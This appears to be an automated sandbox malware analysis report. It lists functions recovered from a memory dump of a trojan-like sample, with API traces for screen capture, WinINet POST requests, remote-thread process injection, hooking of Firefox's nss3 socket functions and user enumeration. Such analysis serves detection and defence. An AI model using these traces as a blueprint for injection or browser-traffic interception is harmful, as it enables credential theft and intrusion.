Part of subcall function 0004CCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0004CD6F

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00042F35, 00042F6C, 00042F94
, xrefs: 00042DD7
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 00042F08

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003DD09, Relevance: 25.7, APIs: 17, Instructions: 205

APIs

TlsAlloc.KERNEL32(00052868,00000000,0000018C,00000000,00000000), ref: 0003DD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0003DD4A
CreateEventW.KERNEL32(00052C30,00000001,00000000,?,84889912,?,00000001), ref: 0003DD74
CreateMutexW.KERNEL32(00052C30,00000000,?,18782822,?,00000001), ref: 0003DD97
CreateFileMappingW.KERNEL32(00000000,00052C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0003DDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0003DDD8
GetDC.USER32(00000000), ref: 0003DDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 0003DE15
GetDeviceCaps.GDI32(?,0000000A), ref: 0003DE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0003DE32

Part of subcall function 00049959: GetDIBits.GDI32(00000000,0003DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00049991
Part of subcall function 00049959: GetDIBits.GDI32(00000000,0003DE4B,00000000,00000001,00000000,00000000,00000000), ref: 000499A7
Part of subcall function 00049959: DeleteObject.GDI32(0003DE4B), ref: 000499B4
Part of subcall function 00049959: CreateDIBSection.GDI32(00000000,00000000,00000000,00052888,?,?), ref: 00049A24
Part of subcall function 00049959: DeleteObject.GDI32(0003DE4B), ref: 00049A43

ReleaseDC.USER32(00000000,?), ref: 0003DE56

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

CreateMutexW.KERNEL32(00052C30,00000000,?,1898B122,?,00000001,000528B8,?,00000102,000528A4,00052E70,00000010,?,?), ref: 0003DF00
GetDC.USER32(00000000), ref: 0003DF15
CreateCompatibleDC.GDI32(00000000), ref: 0003DF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0003DF3A
SelectObject.GDI32(00000000,00000000), ref: 0003DF4D
ReleaseDC.USER32(00000000,00000001), ref: 0003DF65

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00041A04, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 182

APIs

Part of subcall function 00047E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00047E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00041A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00041A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00041AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00041AFD

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00041B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00041B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00041BC0

Part of subcall function 000454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00045505
Part of subcall function 000454F1: GetLastError.KERNEL32 ref: 0004550F
Part of subcall function 000454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0004552F

InternetCloseHandle.WININET(00000000), ref: 00041C05
InternetCloseHandle.WININET(?), ref: 00041C0F
InternetCloseHandle.WININET(?), ref: 00041C19

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

GET, xrefs: 00041A76, 00041AA1
n&<&F&, xrefs: 00041BC0
POST, xrefs: 00041A6F
HTTP/1.1, xrefs: 00041A98

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003E240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 0003E26A
GetMenuItemCount.USER32(00000000), ref: 0003E280
GetMenuState.USER32(00000000,00000000,00000400), ref: 0003E298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0003E2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0003E2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 0003E2E2
EndMenu.USER32 ref: 0003E2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0003E302
GetSubMenu.USER32(00000000,00000000), ref: 0003E326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0003E340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0003E361
GetMenuItemID.USER32(00000000,00000000), ref: 0003E379
SendMessageW.USER32(?,00000111,?,00000000), ref: 0003E392

Part of subcall function 000354A9: GetWindowInfo.USER32(?,?), ref: 00035515
Part of subcall function 000354A9: IntersectRect.USER32(?,?,-00000114), ref: 00035538
Part of subcall function 000354A9: IntersectRect.USER32(?,?,-00000114), ref: 0003558E
Part of subcall function 000354A9: GetDC.USER32(00000000), ref: 000355D2
Part of subcall function 000354A9: CreateCompatibleDC.GDI32(00000000), ref: 000355E3
Part of subcall function 000354A9: ReleaseDC.USER32(00000000,00000000), ref: 000355ED
Part of subcall function 000354A9: SelectObject.GDI32(00000000,?), ref: 00035602
Part of subcall function 000354A9: DeleteDC.GDI32(00000000), ref: 00035610
Part of subcall function 000354A9: TlsSetValue.KERNEL32(?), ref: 0003565B
Part of subcall function 000354A9: EqualRect.USER32(?,?), ref: 00035675
Part of subcall function 000354A9: SaveDC.GDI32(00000000), ref: 00035680
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0003569B
Part of subcall function 000354A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 000356BB
Part of subcall function 000354A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 000356CD
Part of subcall function 000354A9: RestoreDC.GDI32(00000000,?), ref: 000356E4
Part of subcall function 000354A9: SaveDC.GDI32(00000000), ref: 00035706
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0003571C
Part of subcall function 000354A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00035735
Part of subcall function 000354A9: RestoreDC.GDI32(00000000,?), ref: 00035743
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00035756
Part of subcall function 000354A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00035766
Part of subcall function 000354A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00035778
Part of subcall function 000354A9: TlsSetValue.KERNEL32(00000000), ref: 00035792
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000357B2
Part of subcall function 000354A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 000357CE
Part of subcall function 000354A9: SelectObject.GDI32(00000000,?), ref: 000357E4
Part of subcall function 000354A9: DeleteDC.GDI32(00000000), ref: 000357EB
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00035813
Part of subcall function 000354A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00035829

SetKeyboardState.USER32 ref: 0003E3D1
SetEvent.KERNEL32 ref: 0003E3DD

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000470A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 000470B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,000473A4,?,?,00000000,?), ref: 000470D5
GetProcAddress.KERNEL32(FCIAddFile,?,000473A4,?,?,00000000,?), ref: 000470E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,000473A4,?,?,00000000,?), ref: 000470F9
GetProcAddress.KERNEL32(FCIDestroy,?,000473A4,?,?,00000000,?), ref: 0004710B
HeapCreate.KERNEL32(00000000,00080000,00000000,000473A4,?,?,00000000,?), ref: 00047136
FreeLibrary.KERNEL32(000473A4,?,?,00000000,?), ref: 0004714B

Strings

FCIFlushCabinet, xrefs: 000470E9
cabinet.dll, xrefs: 000470B0
FCIDestroy, xrefs: 000470FB
FCIAddFile, xrefs: 000470D7
FCICreate, xrefs: 000470CF

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000350A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(000523AC,0000FDE9,?), ref: 0003515C

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

LeaveCriticalSection.KERNEL32(000523AC,?,000000FF), ref: 000351B7
EnterCriticalSection.KERNEL32(000523AC), ref: 000351D2
getpeername.WS2_32 ref: 0003527F

Part of subcall function 0004681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 00046840

Strings

YISQ, xrefs: 000350EF
\[EP, xrefs: 000350E8
]QPG, xrefs: 0003522A
YIST, xrefs: 0003523A
Z\AV, xrefs: 00035248
OMAV, xrefs: 00035232
EASV, xrefs: 00035250

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004D0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 0004D107
GetProcAddress.KERNEL32(00000000,?), ref: 0004D128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0004D159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0004D17C
FreeLibrary.KERNEL32(00000000), ref: 0004D1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0004D1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0004D212

Part of subcall function 00037125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00037138
Part of subcall function 00037125: PathUnquoteSpacesW.SHLWAPI(?), ref: 000371A0
Part of subcall function 00037125: ExpandEnvironmentStringsW.KERNEL32(?,0004D23A,00000104), ref: 000371AD
Part of subcall function 00037125: LocalFree.KERNEL32(?,.exe,00000000), ref: 000371C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 0004D2AB

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

Part of subcall function 000489C2: PathSkipRootW.SHLWAPI(?), ref: 000489CD
Part of subcall function 000489C2: GetFileAttributesW.KERNEL32(?,?,00000000,0004D261,?,?,?,?,?), ref: 000489F5
Part of subcall function 000489C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0004D261,?,?,?,?,?), ref: 00048A03

Part of subcall function 0004C912: LoadLibraryW.KERNEL32(?), ref: 0004C929
Part of subcall function 0004C912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0004D2A8), ref: 0004C955
Part of subcall function 0004C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0004D2A8,?,?), ref: 0004C96C
Part of subcall function 0004C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0004D2A8,?,?), ref: 0004C984
Part of subcall function 0004C912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0004D2A8,?,?,00000000), ref: 0004C9A1
Part of subcall function 0004C912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0004D2A8,?,?,00000000), ref: 0004CA0D

NetApiBufferFree.NETAPI32(?), ref: 0004D2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0004D2E2

Part of subcall function 0004786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 000478AC
Part of subcall function 0004786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 000478B9

Strings

.exe, xrefs: 0004D1BB, 0004D267, 0004D2EE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004C095, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254

APIs

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

EnterCriticalSection.KERNEL32(00053FE4), ref: 0004C0BC
LeaveCriticalSection.KERNEL32(00053FE4), ref: 0004C11A

Part of subcall function 00041049: EnterCriticalSection.KERNEL32(00052AC8), ref: 00041064
Part of subcall function 00041049: LeaveCriticalSection.KERNEL32(00052AC8), ref: 000410E7
Part of subcall function 00041049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 000411B2
Part of subcall function 00041049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 000413EC

LeaveCriticalSection.KERNEL32(00053FE4), ref: 0004C161

Part of subcall function 0004835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 000483B8

Part of subcall function 000482E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 0004831F

LeaveCriticalSection.KERNEL32(00053FE4), ref: 0004C2CC
EnterCriticalSection.KERNEL32(00053FE4), ref: 0004C2EB
LeaveCriticalSection.KERNEL32(00053FE4), ref: 0004C34D

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

LeaveCriticalSection.KERNEL32(00053FE4), ref: 0004C376
EnterCriticalSection.KERNEL32(00053FE4), ref: 0004C395
LeaveCriticalSection.KERNEL32(00053FE4), ref: 0004C3DD

Strings

If-Modified-Since, xrefs: 0004C20F
Accept-Encoding, xrefs: 0004C1EB
identity, xrefs: 0004C1DF

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00043048, Relevance: 18.1, APIs: 12, Instructions: 138

APIs

Part of subcall function 000420C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00042105
Part of subcall function 000420C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00042172
Part of subcall function 000420C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 000421A7
Part of subcall function 000420C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 000421DB
Part of subcall function 000420C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 000421FA
Part of subcall function 000420C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0004220C
Part of subcall function 000420C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0004221E
Part of subcall function 000420C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00042230
Part of subcall function 000420C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00042242
Part of subcall function 000420C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00042254
Part of subcall function 000420C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0004228D
Part of subcall function 000420C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 0004229C
Part of subcall function 000420C4: InitializeCriticalSection.KERNEL32(0005400C,?,?,00000000), ref: 000422C9
Part of subcall function 000420C4: WSAStartup.WS2_32(00000202,?), ref: 000422DF
Part of subcall function 000420C4: CreateEventW.KERNEL32(00052C30,00000001,00000000,00000000,?,?,00000000), ref: 00042300
Part of subcall function 000420C4: GetLengthSid.ADVAPI32(00000000,000000FF,00052C08,?,?,00000000), ref: 00042335
Part of subcall function 000420C4: GetCurrentProcessId.KERNEL32(00000000,011EF7D0,00000000,?,?,00000000), ref: 00042362

SetErrorMode.KERNEL32(00008007,00000000), ref: 0004306F
GetCommandLineW.KERNEL32(?), ref: 00043079
CommandLineToArgvW.SHELL32(00000000), ref: 00043080
LocalFree.KERNEL32(00000000), ref: 000430D5

Part of subcall function 0003E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0003E108
Part of subcall function 0003E0FB: GetThreadDesktop.USER32(00000000), ref: 0003E10F
Part of subcall function 0003E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0003E128

Part of subcall function 00035BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,000430F6), ref: 00035C03
Part of subcall function 00035BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,000430F6), ref: 00035C0A
Part of subcall function 00035BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,000430F6), ref: 00035C1C
Part of subcall function 00035BF6: SetEvent.KERNEL32(00052868,?,00000001), ref: 00035C69
Part of subcall function 00035BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00035C76

Part of subcall function 0003DF74: DeleteObject.GDI32(00000000), ref: 0003DF87
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003DF97
Part of subcall function 0003DF74: TlsFree.KERNEL32(00000000,00000000,00052868,00000000,0003E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0003DFA2
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003DFB0
Part of subcall function 0003DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00052868,00000000,0003E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0003DFBA
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003DFC7
Part of subcall function 0003DF74: SelectObject.GDI32(00000000,00000000), ref: 0003DFE1
Part of subcall function 0003DF74: DeleteObject.GDI32(00000000), ref: 0003DFF2
Part of subcall function 0003DF74: DeleteDC.GDI32(00000000), ref: 0003DFFF
Part of subcall function 0003DF74: CloseHandle.KERNEL32(00000000), ref: 0003E010
Part of subcall function 0003DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0003E01F
Part of subcall function 0003DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0003E038

Part of subcall function 00042B08: GetModuleHandleW.KERNEL32(?), ref: 00042B1F
Part of subcall function 00042B08: GetProcAddress.KERNEL32(00000000,?), ref: 00042B41

Part of subcall function 00042D01: CreateMutexW.KERNEL32(00052C30,00000001,?,32901130,?,00000001,?), ref: 00042D91
Part of subcall function 00042D01: GetLastError.KERNEL32 ref: 00042DA3
Part of subcall function 00042D01: CloseHandle.KERNEL32(000001E6), ref: 00042DBA
Part of subcall function 00042D01: ExitWindowsEx.USER32(00000014,80000000), ref: 00042DFD
Part of subcall function 00042D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00042E1C
Part of subcall function 00042D01: SetEvent.KERNEL32(00000000), ref: 00042E29
Part of subcall function 00042D01: CloseHandle.KERNEL32(00000000), ref: 00042E30
Part of subcall function 00042D01: CloseHandle.KERNEL32(000001E6), ref: 00042E42
Part of subcall function 00042D01: ReadProcessMemory.KERNEL32(000000FF,00260014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00042EA6
Part of subcall function 00042D01: Sleep.KERNEL32(000001F4), ref: 00042EB8
Part of subcall function 00042D01: IsWellKnownSid.ADVAPI32(011EF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00042EC9
Part of subcall function 00042D01: ReadProcessMemory.KERNEL32(000000FF,00260014,00000000,00000001,00000000), ref: 00042EF1
Part of subcall function 00042D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00042F0D
Part of subcall function 00042D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00042F50
Part of subcall function 00042D01: CreateEventW.KERNEL32(00052C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00042FCE
Part of subcall function 00042D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00042FE7
Part of subcall function 00042D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00042FF7
Part of subcall function 00042D01: CloseHandle.KERNEL32(0000000C), ref: 0004300D
Part of subcall function 00042D01: CloseHandle.KERNEL32(?), ref: 00043013
Part of subcall function 00042D01: CloseHandle.KERNEL32(?), ref: 00043016

Sleep.KERNEL32(000000FF,?,00000001), ref: 0004312B
ExitProcess.KERNEL32(00000000,00000000), ref: 0004313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00043157

Part of subcall function 00042542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00042574
Part of subcall function 00042542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0004316D,?,00000000,?,?,00000000), ref: 000425AB
Part of subcall function 00042542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0004316D,?,00000000,?,?,00000000), ref: 000425CB
Part of subcall function 00042542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0004316D,?,00000000), ref: 0004261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00095903,00000000,00000000,00000000), ref: 00043185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00043198
CloseHandle.KERNEL32(?), ref: 000431A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 000431B5
CloseHandle.KERNEL32(00000000), ref: 000431BC

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003DF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 0003DF87
CloseHandle.KERNEL32(00000000), ref: 0003DF97
TlsFree.KERNEL32(00000000,00000000,00052868,00000000,0003E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0003DFA2
CloseHandle.KERNEL32(00000000), ref: 0003DFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,00052868,00000000,0003E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0003DFBA
CloseHandle.KERNEL32(00000000), ref: 0003DFC7
SelectObject.GDI32(00000000,00000000), ref: 0003DFE1
DeleteObject.GDI32(00000000), ref: 0003DFF2
DeleteDC.GDI32(00000000), ref: 0003DFFF
CloseHandle.KERNEL32(00000000), ref: 0003E010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0003E01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0003E038

Part of subcall function 00044DCA: CloseHandle.KERNEL32(00000000), ref: 00044DD9
Part of subcall function 00044DCA: CloseHandle.KERNEL32(00000000), ref: 00044DE2

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00044CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00044CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00044D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00044D19
CreateProcessAsUserW.ADVAPI32(?,00000000,0004C8F5,00000000,00000000,00000000,0004C8F5,0004C8F5,00000000,?,?,?,00000000,00000044), ref: 00044D8A
CloseHandle.KERNEL32(?), ref: 00044D9D
CloseHandle.KERNEL32(?), ref: 00044DA2
FreeLibrary.KERNEL32(?), ref: 00044DB9

Strings

userenv.dll, xrefs: 00044CE6
CreateEnvironmentBlock, xrefs: 00044D07
DestroyEnvironmentBlock, xrefs: 00044D0F

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003C103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,000420A9), ref: 0003C111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,000420A9), ref: 0003C125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0003C132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0003C13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0003C14C

Part of subcall function 0003BE3B: VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0003C160,00052360), ref: 0003BE72

Part of subcall function 0004B58C: InitializeCriticalSection.KERNEL32(00053FE4,76C61857,0003C185,00052360), ref: 0004B5A2
Part of subcall function 0004B58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0004B5DE
Part of subcall function 0004B58C: GetProcAddress.KERNEL32(PR_SetError), ref: 0004B5F0
Part of subcall function 0004B58C: GetProcAddress.KERNEL32(PR_GetError), ref: 0004B602

Strings

nss3.dll, xrefs: 0003C10C
PR_Write, xrefs: 0003C141
PR_OpenTCPSocket, xrefs: 0003C11F
PR_Close, xrefs: 0003C127
PR_Read, xrefs: 0003C134

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00035C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 0003DCA2: GetClassNameW.USER32(002601CA,?,00000101), ref: 0003DCBD

GetWindowThreadProcessId.USER32(?,?), ref: 00035CB4
ResetEvent.KERNEL32(00000010), ref: 00035D03
PostMessageW.USER32(?,?,?,00000010), ref: 00035D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00035D35

Part of subcall function 00035B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 00035B40
Part of subcall function 00035B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00035B9A
Part of subcall function 00035B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00035BD6
Part of subcall function 00035B28: TerminateProcess.KERNEL32(?,00000000), ref: 00035BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 00035D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00035D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00035D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00035DA7

Part of subcall function 00044DCA: CloseHandle.KERNEL32(00000000), ref: 00044DD9
Part of subcall function 00044DCA: CloseHandle.KERNEL32(00000000), ref: 00044DE2

IntersectRect.USER32(?,?), ref: 00035DC7
FillRect.USER32(?,?,00000006), ref: 00035DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00035DED

Part of subcall function 00047A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00047AB5

Part of subcall function 00046B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00042E87,?,19367401,?,00000001,8889347B,00000002), ref: 00046BA9
Part of subcall function 00046B9E: CloseHandle.KERNEL32(00000000), ref: 00046BB4

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003B5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 00047AF0: WindowFromPoint.USER32(?,?), ref: 00047B0C
Part of subcall function 00047AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00047B3D
Part of subcall function 00047AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 00047B61
Part of subcall function 00047AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00047B72
Part of subcall function 00047AF0: GetWindowLongW.USER32(?,000000F0), ref: 00047B8F
Part of subcall function 00047AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00047B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 0003B6B6
GetParent.USER32(00000000), ref: 0003B6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 0003B6FD
IsWindow.USER32(?), ref: 0003B720

